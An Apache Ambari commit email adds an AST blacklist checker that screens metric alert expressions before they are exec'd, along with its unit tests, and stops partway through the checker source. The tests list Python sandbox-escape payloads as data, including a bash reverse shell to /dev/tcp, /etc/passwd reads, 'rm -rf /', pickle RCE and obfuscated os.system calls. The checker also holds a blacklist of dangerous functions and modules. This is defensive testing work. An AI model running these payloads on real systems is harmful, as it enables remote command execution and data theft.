This is an automated email from the ASF dual-hosted git repository.
jialiang pushed a commit to branch branch-2.7
in repository https://gitbox.apache.org/repos/asf/ambari.git
The following commit(s) were added to refs/heads/branch-2.7 by this push:
new c8cd397205 AMBARI-26202: Fix metrics issue (#3886)
c8cd397205 is described below
commit c8cd3972058f907c404166ef4252bd2e62338bea
Author: jialiang <[email protected]>
AuthorDate: Fri Nov 22 09:33:01 2024 +0800
AMBARI-26202: Fix metrics issue (#3886)
---
.../main/python/ambari_agent/alerts/ams_alert.py | 8 +
.../python/ambari_agent/alerts/metric_alert.py | 6 +
.../src/test/python/ambari_agent/TestASTChecker.py | 449 +++++++++++++++++++++
.../src/main/python/ambari_commons/ast_checker.py | 402 ++++++++++++++++++
4 files changed, 865 insertions(+)
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
index 4f59143189..09a77d884d 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
@@ -30,6 +30,7 @@ import uuid
from resource_management.libraries.functions.get_port_from_url import
get_port_from_url
from ambari_commons import inet_utils
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
logger = logging.getLogger(__name__)
@@ -210,9 +211,13 @@ def f(args):
self.interval = metric_info['interval'] # in minutes
self.app_id = metric_info['app_id']
self.minimum_value = metric_info['minimum_value']
+ self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
if 'value' in metric_info:
realcode = re.sub('(\{(\d+)\})', 'args[\g<2>][k]', metric_info['value'])
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("AmsMetric: Value expression {} is not safe,blocked
by checker".format(realcode))
+ raise Exception("AmsMetric: Value expression {} is not
safe".format(realcode))
self.custom_value_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_VALUE_TEMPLATE.format(realcode)
@@ -220,6 +225,9 @@ def f(args):
if 'compute' in metric_info:
realcode = metric_info['compute']
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("AmsMetric: compute expression {} is not safe,blocked
by checker".format(realcode))
+ raise Exception("AmsMetric: compute expression {} is not
safe".format(realcode))
self.custom_compute_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_COMPUTE_TEMPLATE.format(realcode)
exec code in self.custom_compute_module.__dict__
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
index 94da8d33bf..b5924a1f5b 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
@@ -32,6 +32,7 @@ from
resource_management.libraries.functions.get_port_from_url import get_port_f
from resource_management.libraries.functions.curl_krb_request import
curl_krb_request
from ambari_commons import inet_utils
from ambari_commons.constants import AGENT_TMP_DIR
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
logger = logging.getLogger(__name__)
@@ -287,10 +288,15 @@ def f(args):
self.custom_module = None
self.property_list = jmx_info['property_list']
self.property_map = {}
+ self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
if 'value' in jmx_info:
realcode = re.sub('(\{(\d+)\})', 'args[\g<2>]', jmx_info['value'])
+
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("The expression {} is not safe,blocked by
checker".format(realcode))
+ raise Exception("The expression {} is not safe".format(realcode))
self.custom_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_TEMPLATE.format(realcode)
exec code in self.custom_module.__dict__
diff --git a/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
new file mode 100644
index 0000000000..6fd1f4f0e1
--- /dev/null
+++ b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
@@ -0,0 +1,449 @@
+#!/usr/bin/env python2
+
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import unittest
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
+from ambari_agent.alerts.metric_alert import JmxMetric
+from ambari_agent.alerts.ams_alert import AmsMetric
+
+class TestJmxMetric(unittest.TestCase):
+ def test_jmx_metric_calculation(self):
+ jmx_info = {
+ 'property_list': ['a/b', 'c/d'],
+ 'value': '({0} + {1}) / 100.0'
+ }
+ metric = JmxMetric(jmx_info)
+ result = metric.calculate([50, 50])
+ self.assertEqual(result, 1.0)
+
+ def test_jmx_metric_with_complex_calculation(self):
+ jmx_info = {
+ 'property_list': ['x/y', 'z/w'],
+ 'value': 'max({0}, {2}) / min({1}, {3}) * 100.0'
+ }
+ metric = JmxMetric(jmx_info)
+ result = metric.calculate([100, 50, 200, 25])
+ self.assertEqual(result, 800.0)
+
+ def test_jmx_metric_with_string_manipulation(self):
+ jmx_info = {
+ 'property_list': ['str1/value', 'str2/value'],
+ 'value': "len({0}) + len({1})"
+ }
+ metric = JmxMetric(jmx_info)
+ result = metric.calculate(['hello', 'world'])
+ self.assertEqual(result, 10)
+
+ def test_jmx_metric_with_unsafe_operation(self):
+ jmx_info = {
+ 'property_list': ['a/b'],
+ 'value': "__import__('os').system('echo hacked')"
+ }
+
+ with self.assertRaises(Exception):
+ JmxMetric(jmx_info)
+
+class TestAmsMetric(unittest.TestCase):
+ # Safe test cases
+ def test_safe_simple_calculation(self):
+ metric_info = {
+ 'metric_list': ['a', 'b'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'args[0][k] + args[1][k]'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': 10}, {'k': 20}])
+ self.assertEqual(result, [30])
+
+ def test_safe_complex_calculation(self):
+ metric_info = {
+ 'metric_list': ['x', 'y', 'z'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'max(args[0][k], args[1][k]) / min(args[1][k], args[2][k]) *
100.0'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': 100}, {'k': 50}, {'k': 25}])
+ self.assertEqual(result, [400.0])
+
+ def test_safe_string_manipulation(self):
+ metric_info = {
+ 'metric_list': ['str1', 'str2'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'len(str(args[0][k])) + len(str(args[1][k]))'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': 'hello'}, {'k': 'world'}])
+ self.assertEqual(result, [10])
+
+ def test_safe_list_comprehension(self):
+ metric_info = {
+ 'metric_list': ['numbers'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'sum([x for x in args[0][k] if x > 5])'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': [1, 6, 2, 7, 3, 8]}])
+ self.assertEqual(result, [21])
+
+ def test_safe_dict_manipulation(self):
+ metric_info = {
+ 'metric_list': ['data'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'sum(args[0][k].values())'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': {'a': 1, 'b': 2, 'c': 3}}])
+ self.assertEqual(result, [6])
+
+ def test_safe_conditional_expression(self):
+ metric_info = {
+ 'metric_list': ['x', 'y'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'args[0][k] if args[0][k] > args[1][k] else args[1][k]'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': 10}, {'k': 20}])
+ self.assertEqual(result, [20])
+
+ def test_safe_boolean_operations(self):
+ metric_info = {
+ 'metric_list': ['a', 'b', 'c'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': 'int(args[0][k] > 0 and args[1][k] < 10 or args[2][k] == 5)'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_value([{'k': 1}, {'k': 5}, {'k': 5}])
+ self.assertEqual(result, [1])
+
+ def test_safe_compute_mean(self):
+ metric_info = {
+ 'metric_list': ['numbers'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'compute': 'mean'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_compute([1, 2, 3, 4, 5]) # Pass a flat list
+ self.assertEqual(result, 3)
+
+ def test_safe_compute_standard_deviation(self):
+ metric_info = {
+ 'metric_list': ['numbers'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'compute': 'sample_standard_deviation'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_compute([1, 2, 3, 4, 5]) # Pass a flat list
+ self.assertAlmostEqual(result, 1.4142, places=4)
+
+ def test_safe_compute_count(self):
+ metric_info = {
+ 'metric_list': ['numbers'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'compute': 'count'
+ }
+ metric = AmsMetric(metric_info)
+ result = metric.calculate_compute([1, 2, 3, 4, 5]) # Pass a flat list
+ self.assertEqual(result, 5)
+
+ # Unsafe test cases
+ def test_unsafe_import(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "__import__('os').system('echo hacked')"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_eval(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "eval('2 + 2')"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_exec(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "exec('x = 5')"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_open_file(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "open('/etc/passwd', 'r').read()"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_subprocess(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "__import__('subprocess').call(['ls', '-l'])"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_globals(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "globals()['__builtins__']"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_attribute_access(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "args.__class__.__bases__[0].__subclasses__()"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_pickle(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "__import__('pickle').loads(b'cos\\nsystem\\n(S\"echo
hacked\"\\ntR.')"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_custom_function(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "lambda: __import__('os').system('echo hacked')"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+ def test_unsafe_builtin_override(self):
+ metric_info = {
+ 'metric_list': ['a'],
+ 'interval': 5,
+ 'app_id': 'test_app',
+ 'minimum_value': 0,
+ 'value': "__builtins__.__dict__['print'] = lambda x: exec(x)"
+ }
+ with self.assertRaises(Exception):
+ AmsMetric(metric_info)
+
+class TestBlacklistASTChecker(unittest.TestCase):
+ def setUp(self):
+ self.checker = ASTChecker([BlacklistRule()], use_blacklist=True)
+
+ def test_safe_expressions(self):
+ safe_expressions = [
+ # Original safe expressions
+ "mean",
+ "1.5",
+ "200",
+ "args[0] * 100",
+ "(args[1] - args[0])/args[1] * 100",
+ "args[0]",
+ "'[email protected]'",
+ "calculate(args[0])",
+ "args[0] + args[1]",
+ "args[0] > args[1]",
+ "args[0] and args[1]",
+ "not args[0]",
+ "-args[0]",
+ "args[0] ** 2",
+ "args[0] // 3",
+ "args[0] % 2",
+ "args[0][k]",
+ "args[1][k]",
+ "len(args[0])",
+ "max(args[0][k], args[1][k])",
+ "min(args[0][k], 10)",
+ "args[0][k] + args[1][k]",
+ "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+ "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+ "(args[0][k] + args[1][k] + args[2][k]) / 3",
+ "len(str(args[0][k]))",
+ "int(args[0][k]) if args[0][k] is not None else 0",
+ "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] <
50 else args[0][k]",
+
+ # Safe expressions from test_expressions
+ "max(args[0], args[1])",
+ "len([1, 2, 3])",
+ "print('Hello, world!')",
+ "x = [i for i in range(10)]",
+ "def custom_function(x): return x * 2",
+ "class CustomClass: pass",
+ "try: 1/0\nexcept ZeroDivisionError: pass",
+ "safe_function([1, 2, 3])",
+
+ # Safe expressions from ams
+ "args[0][k]",
+ "args[1][k]",
+ "len(args[0])",
+ "max(args[0][k], args[1][k])",
+ "min(args[0][k], 10)",
+ "args[0][k] + args[1][k]",
+ "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
+ "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
+ "(args[0][k] + args[1][k] + args[2][k]) / 3",
+ "len(str(args[0][k]))",
+ "int(args[0][k]) if args[0][k] is not None else 0",
+ "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] <
50 else args[0][k]",
+ "sample_standard_deviation_percentage(args)",
+ "sample_standard_deviation(args)",
+ "mean(args)",
+ "count(args)",
+ ]
+
+
+ for expr in safe_expressions:
+ try:
+ self.assertTrue(self.checker.is_safe_expression(expr), "Expression
should be safe: {}".format(expr))
+ except Exception as e:
+ print("Error: {}, Expression should be safe: {}".format(e, expr))
+ raise
+
+ def test_unsafe_expressions(self):
+ unsafe_expressions = [
+ # Original unsafe expressions
+ "__import__('os').system('bash -i >& /dev/tcp/127.0.0.1/18888 0>&1')",
+ "open('/etc/passwd').read()",
+ "exec('malicious code')",
+ "exec('x = 5')",
+ "eval('dangerous_function()')",
+ "globals()['__builtins__']['__import__']('os').system('rm -rf /')",
+ "getattr(__import__('os'), 'system')('echo hacked')",
+ "(lambda: __import__('subprocess').call('ls'))()",
+ "__class__.__base__.__subclasses__()[40]('/etc/passwd').read()",
+ "import os; os.system('whoami')",
+
"().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].system('ls')",
+ "args[0].__class__.__bases__[0].__subclasses__()",
+ "args[0].__dict__",
+ "args[0].__globals__",
+
+ # Unsafe expressions from test_expressions
+ "with open('file.txt', 'r') as f: content = f.read()",
+ "eval('1 + 1')",
+ "os.system('echo hello')",
+ "__import__('os').system('echo hello')",
+ "obj._private_method()",
+ "obj.__dict__",
+ "_hidden_function()",
+ "from module import _private_func",
+ "import _private_module",
+
+ # Additional unsafe expressions
+ "import subprocess; subprocess.Popen('ls', shell=True)",
+ "import pickle; pickle.loads(b'cos\\nsystem\\n(S\'echo
hacked\'\\ntR.\')",
+ "__import__('os').popen('ls').read()",
+ "import importlib; importlib.import_module('os').system('echo hacked')",
+ "exec(\"__import__('os').system('echo hacked')\")",
+ "(lambda f: f(f))(lambda f: __import__('os').system('echo hacked') or
f(f))",
+ "__builtins__.__dict__['__import__']('os').system('echo hacked')",
+ "globals().get('__builtins__').get('__import__')('os').system('echo
hacked')",
+ "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ ==
'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('echo
hacked')",
+ "next(c for c in {}.__class__.__bases__[0].__subclasses__() if
c.__name__ == 'Popen')(['echo', 'hacked'])",
+ "type(''.join, (object,), {'__getitem__': lambda self, _:
__import__('os').system('echo hacked')})()['']",
+
"().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].system('echo
hacked')",
+
"getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(__import__('os'),
'path'), 'abspath'), '__globals__'), '__builtins__'), '__import__'),
'__globals__'), '__builtins__'), '__import__'), '__globals__'),
'__builtins__'), '__import__'), '__globals__'), '__builtins__'),
'__import__')('os').system('echo hacked')",
+ "(__builtins__.__dict__['__import__']('functools').reduce(lambda f, n:
getattr(f, n), ['__globals__', '__builtins__', '__import__'],
__import__('os')))('os').system('echo hacked')",
+ "type(''.join, (object,), {'__getitem__': lambda self, _:
__import__('os').system('echo hacked')})()['']",
+ "(lambda fc=(lambda n: [c for c in
().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]):
fc('Popen')(['echo', 'hacked']))()",
+ "(lambda x:
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo
hacked')",
+ "getattr(__import__('ctypes'), 'windll',
__import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+ "type(''.join, (object,), {'__getitem__': lambda self, _:
__import__('os').system('echo hacked')})()['']",
+ "next(filter(lambda x: x.__name__ == 'Popen',
().__class__.__bases__[0].__subclasses__()))(['echo', 'hacked'])",
+ "(lambda fc=(lambda n: [c for c in
().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]):
fc('Popen')(['echo', 'hacked']))()",
+ "(lambda x:
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo
hacked')",
+ "getattr(__import__('ctypes'), 'windll',
__import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
+
"(__import__('codecs').decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2VjaG8gaGFja2VkJyk=',
'base64'))",
+ "compile('__import__(\\'os\\').system(\\'echo hacked\\')', '<string>',
'exec')",
+ "locals()['__builtins__']['__import__']('os').system('echo hacked')",
+ "vars(__builtins__)['__import__']('os').system('echo hacked')",
+ "(lambda x:
x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['eval']('__import__(\\'os\\').system(\\'echo
hacked\\')')",
+ "(lambda x:
x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['__import__']('os').system('echo
hacked')",
+
+ "import os",
+ "open('file.txt', 'w')",
+ "eval('1 + 1')",
+ "exec('print(\"Hello\")')",
+ "__import__('os').system('ls')",
+ "globals()['__builtins__']['eval']('1+1')",
+ "args[0].__class__.__bases__[0].__subclasses__()",
+ ]
+
+ for expr in unsafe_expressions:
+ try:
+ self.assertFalse(self.checker.is_safe_expression(expr), "Expression
should be unsafe: {}".format(expr))
+ except Exception as e:
+ print("Error: {}, Expression should be safe: {}".format(e, expr))
+ raise
+
+
+ def test_syntax_error(self):
+ expr = "(args[1] - args[0])/{args[1] * 100"
+ self.assertFalse(self.checker.is_safe_expression(expr), "Expression with
syntax error should be unsafe: {}".format(expr))
+
diff --git a/ambari-common/src/main/python/ambari_commons/ast_checker.py
b/ambari-common/src/main/python/ambari_commons/ast_checker.py
new file mode 100644
index 0000000000..9839b3b09f
--- /dev/null
+++ b/ambari-common/src/main/python/ambari_commons/ast_checker.py
@@ -0,0 +1,402 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/env python2
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import ast
+from abc import ABCMeta, abstractmethod
+
+import logging
+logger = logging.getLogger(__name__)
+"""
+This module provides a framework for checking the safety of Python code
expressions.
+It includes abstract base classes for defining rule templates, concrete rule
implementations,
+and an AST checker that applies these rules to validate code safety.
+"""
+
+class RuleTemplate(object):
+ """
+ Abstract base class for defining rule templates.
+ Subclasses should implement methods to specify allowed names, functions,
node types,
+ and custom checks for AST nodes.
+ """
+ __metaclass__ = ABCMeta
+
+ @abstractmethod
+ def allowed_names(self):
+ """Return a set of allowed variable names."""
+ pass
+
+ @abstractmethod
+ def allowed_functions(self):
+ """Return a set of allowed function names."""
+ pass
+
+ @abstractmethod
+ def allowed_node_types(self):
+ """Return a set of allowed AST node types."""
+ pass
+
+ @abstractmethod
+ def custom_checks(self):
+ """Return a dictionary of custom check functions for specific AST node
types."""
+ pass
+
+class DefaultRule(RuleTemplate):
+ """
+ A default implementation of RuleTemplate that provides a basic set of
allowed
+ names, functions, node types, and no custom checks.
+ """
+
+ def allowed_names(self):
+ """Allow only 'args' as a variable name."""
+ return {'args'}
+
+ def allowed_functions(self):
+ """Allow a limited set of safe functions."""
+ return {'calculate', 'max', 'min', 'len'}
+
+ def allowed_node_types(self):
+ """Allow a comprehensive set of safe AST node types."""
+ return {
+ ast.Num, ast.Str, ast.Constant,
+ ast.Name, ast.Call, ast.BinOp, ast.UnaryOp,
+ ast.Compare, ast.BoolOp, ast.Subscript, ast.Index,
+ ast.Load, ast.Expression,
+ ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod,
ast.Pow,
+ ast.UAdd, ast.USub,
+ ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
+ ast.And, ast.Or, ast.Not,
+ ast.Subscript, ast.Lambda, ast.IfExp, ast.If, ast.Return,
ast.Continue
+ }
+
+ def custom_checks(self):
+ """No custom checks for the default rule."""
+ return {}
+
+class ASTChecker:
+ """
+ A class that checks the safety of Python code by analyzing its Abstract
Syntax Tree (AST).
+ It applies a set of rules to determine if the code contains only allowed
constructs.
+ """
+
+ def __init__(self, rules, use_blacklist = False):
+ """
+ Initialize the ASTChecker with a list of rules and a flag to use
blacklist mode.
+
+ :param rules: List of RuleTemplate objects defining the safety rules.
+ :param use_blacklist: If True, use blacklist mode; otherwise, use
whitelist mode.
+ """
+ self.rules = rules
+ self.use_blacklist = use_blacklist
+ if not use_blacklist:
+ self._compile_rules()
+
+ def _compile_rules(self):
+ """Compile all rules into combined sets of allowed constructs."""
+ self.allowed_names = set().union(*(rule.allowed_names() for rule in
self.rules))
+ self.allowed_functions = set().union(*(rule.allowed_functions() for
rule in self.rules))
+ self.allowed_node_types = set().union(*(rule.allowed_node_types() for
rule in self.rules))
+
+ # Combine custom checks from all rules
+ self.custom_checks = {}
+ for rule in self.rules:
+ for node_type, check_func in rule.custom_checks().items():
+ if node_type in self.custom_checks:
+ original_func = self.custom_checks[node_type]
+ self.custom_checks[node_type] = lambda node,
of=original_func, nf=check_func: of(node) and nf(node)
+ else:
+ self.custom_checks[node_type] = check_func
+
+ def is_safe_expression(self, code):
+ """
+ Check if the given code string is a safe expression according to the
defined rules.
+
+ :param code: The code string to check.
+ :return: True if the code is safe, False otherwise.
+ """
+ try:
+ # First, try to parse as an expression
+ tree = ast.parse(code, mode='eval')
+ except SyntaxError:
+ try:
+ # If that fails, try to parse as a statement
+ tree = ast.parse(code, mode='exec')
+ except SyntaxError:
+ logger.info("Syntax error in expression: {}".format(code))
+ return False
+
+ return self.is_safe_node(tree)
+
+ def is_safe_node(self, node):
+ """
+ Recursively check if an AST node and all its children are safe.
+
+ :param node: The AST node to check.
+ :return: True if the node and all its children are safe, False
otherwise.
+ """
+ # Apply custom checks from all rules
+ for rule in self.rules:
+ custom_checks = rule.custom_checks()
+ for node_type, check_func in custom_checks.items():
+ if isinstance(node, node_type):
+ if not check_func(node):
+ return False
+
+ # Recursively check all child nodes
+ for child in ast.iter_child_nodes(node):
+ if not self.is_safe_node(child):
+ return False
+
+ return True
+
+ def _is_safe_node_blacklist(self, node):
+ """
+ Check if a node is safe using blacklist rules.
+
+ :param node: The AST node to check.
+ :return: True if the node is not blacklisted, False otherwise.
+ """
+ for rule in self.rules:
+ custom_checks = rule.custom_checks()
+ if type(node) in custom_checks:
+ if not custom_checks[type(node)](node):
+ return False
+ return True
+
+ def _is_safe_node_whitelist(self, node):
+ """
+ Check if a node is safe using whitelist rules.
+
+ :param node: The AST node to check.
+ :return: True if the node is allowed, False otherwise.
+ """
+ if not isinstance(node, tuple(self.allowed_node_types)):
+ logger.info("Node type not allowed:
{}".format(type(node).__name__))
+ return False
+
+ if isinstance(node, ast.Name):
+ if node.id not in self.allowed_names and node.id not in
self.allowed_functions:
+ logger.info("Name not allowed: {}".format(node.id))
+ return False
+ elif isinstance(node, ast.Call):
+ if not isinstance(node.func, ast.Name) or node.func.id not in
self.allowed_functions:
+ logger.info("Function call not allowed:
{}".format(ast.dump(node.func)))
+ return False
+
+ node_type = type(node)
+ if node_type in self.custom_checks:
+ if not self.custom_checks[node_type](node):
+ logger.info("Custom check failed for node:
{}".format(ast.dump(node)))
+ return False
+
+ # Recursively check child nodes
+ for child in ast.iter_child_nodes(node):
+ if not self.is_safe_node(child):
+ return False
+
+ return True
+
+ def print_ast_tree(self, code):
+ """
+ Print the AST tree of the given code string.
+
+ :param code: The code string to visualize.
+ """
+ try:
+ tree = ast.parse(code, mode='exec')
+ logger.info("AST Tree:")
+ self._print_node(tree, "", True)
+ except SyntaxError:
+ logger.info("Syntax error in expression: {}".format(code))
+
+ def _print_node(self, node, prefix, is_last):
+ """
+ Recursively print an AST node and its children.
+
+ :param node: The AST node to print.
+ :param prefix: The prefix string for the current line.
+ :param is_last: Whether this is the last child of its parent.
+ """
+ print prefix + ("└── " if is_last else "├── ") + type(node).__name__
+
+ # Prepare the prefix for child nodes
+ child_prefix = prefix + (" " if is_last else "│ ")
+
+ # Get all fields of the node
+ fields = [(name, value) for name, value in ast.iter_fields(node)]
+
+ # Print fields and child nodes
+ for i, (name, value) in enumerate(fields):
+ is_last_field = i == len(fields) - 1
+
+ if isinstance(value, ast.AST):
+ self._print_node(value, child_prefix, is_last_field)
+ elif isinstance(value, list) and value and isinstance(value[0],
ast.AST):
+ print child_prefix + ("└── " if is_last_field else "├── ") +
name + ":"
+ for j, item in enumerate(value):
+ self._print_node(item, child_prefix + " ", j ==
len(value) - 1)
+ else:
+ print child_prefix + ("└── " if is_last_field else "├── ") +
"{}: {}".format(name,value)
+
+class BlacklistRule:
+ """
+ A rule that defines a blacklist of dangerous functions, modules, and
constructs.
+ It provides custom checks to ensure these blacklisted items are not used
in the code.
+ """
+
+ def __init__(self):
+ """Initialize the blacklist of dangerous items and modules."""
+ self.blacklist = {
+ 'eval', 'exec', 'compile', '__import__', 'open', 'file',
+ 'os.system', 'subprocess.call', 'subprocess.Popen',
+ 'pickle.loads', 'pickle.load', 'marshal.loads',
+ 'builtins', '__builtins__', 'globals', 'locals', 'getattr',
+ 'setattr', 'delattr', 'hasattr', 'importlib',
'importlib.import_module',
+ 'os', 'subprocess', 'sys', 'shutil', 'pty'
+ }
+ self.dangerous_modules = {'os', 'subprocess', 'sys', 'importlib',
'pickle', 'marshal'}
+
+ def custom_checks(self):
+ """Return a dictionary of custom check functions for specific AST node
types."""
+ return {
+ ast.Name: self._check_name,
+ ast.Call: self._check_call,
+ ast.Attribute: self._check_attribute,
+ ast.Import: self._check_import,
+ ast.ImportFrom: self._check_importfrom,
+ ast.Subscript: self._check_subscript,
+ ast.Module: self._check_module,
+ ast.Exec: self._check_exec,
+ }
+
+ def _check_exec(self, node):
+ return False
+
+ def _check_name(self, node):
+ """Check if a Name node is not in the blacklist and doesn't start with
an underscore."""
+ if isinstance(node, ast.Name):
+ return node.id not in self.blacklist and not
node.id.startswith('_')
+ return True
+
+ def _check_call(self, node):
+ """Check if a function call is safe."""
+ if isinstance(node.func, ast.Name):
+ return node.func.id not in self.blacklist and not
node.func.id.startswith('_')
+ elif isinstance(node.func, ast.Attribute):
+ return self._check_attribute(node.func)
+ return True
+
+ def _check_attribute(self, node):
+ """Check if an attribute access is safe."""
+ full_name = self._get_attribute_name(node)
+ return full_name not in self.blacklist and not
full_name.split('.')[-1].startswith('_')
+
+ def _check_import(self, node):
+ """Check if an import statement is safe."""
+ return all(alias.name not in self.dangerous_modules and not
alias.name.startswith('_') for alias in node.names)
+
+ def _check_importfrom(self, node):
+ """Check if an import from statement is safe."""
+ if node.module in self.dangerous_modules or (node.module and
node.module.startswith('_')):
+ return False
+ return all(alias.name not in self.blacklist and not
alias.name.startswith('_') for alias in node.names)
+
+ def _check_subscript(self, node):
